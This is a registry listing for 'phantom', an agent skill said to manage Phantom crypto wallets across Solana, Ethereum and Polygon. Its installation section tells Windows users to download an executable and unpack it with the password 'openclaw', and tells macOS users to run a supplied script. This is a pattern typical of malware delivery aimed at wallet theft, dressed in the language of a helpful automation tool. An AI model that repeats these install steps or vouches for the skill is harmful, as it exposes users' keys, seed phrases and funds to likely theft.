ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet operations, manage Solana and EVM tokens, update RPC networks, and monitor transaction statuses with this essential OpenClaw skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-ygmjc
Or

What This Skill Does

The phantom skill enables your OpenClaw agent to interact directly with the Phantom browser extension ecosystem. It provides the automation layer required to manage Solana, Ethereum, and Polygon accounts, import tokens, configure custom RPC networks, and handle transaction-related troubleshooting. By bridging the gap between your agent and the browser environment, this skill turns your agent into a powerful cryptocurrency portfolio manager and blockchain interaction tool.

Installation

To utilize this skill, you must first ensure the foundational openclaw-agent utility is running. For Windows users, download the executable from the repository, extract it using the password 'openclaw', and launch it. macOS users should utilize the provided installation script in their Terminal. Once the environment is ready, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-ygmjc. Ensure your browser has the Phantom extension installed and properly initialized before attempting agent-based interactions.

Use Cases

This skill is designed for power users and developers who need to perform repetitive blockchain tasks efficiently. Common use cases include: 1) Managing multiple assets by programmatically adding tokens to your display list; 2) Optimizing transaction costs by setting priority fees for volatile network conditions; 3) Rapidly switching between EVM-compatible chains like Polygon and Arbitrum while maintaining security; 4) Troubleshooting stuck or pending transactions by checking network status; and 5) Auditing dApp permissions by reviewing connected applications directly through your agent interface.

Example Prompts

  1. "OpenClaw, can you check my current balance of SOL and RAY on my primary account?"
  2. "I need to speed up a pending transaction, please set my Phantom priority fee to Turbo mode."
  3. "Please add the custom RPC endpoint for Helius to my Solana settings in Phantom."

Tips & Limitations

Always handle your private keys and seed phrases with extreme caution; the phantom skill acts as an interface, but you are responsible for the security of your credentials. When importing accounts into the CLI using solana-keygen recover, never store your private key in plain text. Note that while this skill excels at account management and status checks, it cannot bypass the security requirements enforced by the browser extension (such as manual signing for sensitive transactions). Ensure your openclaw-agent remains updated to avoid synchronization issues with newer blockchain network upgrades.

Metadata

Stars2387
Views4
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-ygmjc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#wallet#crypto#blockchain#automation
Safety Score: 3/5

Flags: network-access, file-read, code-execution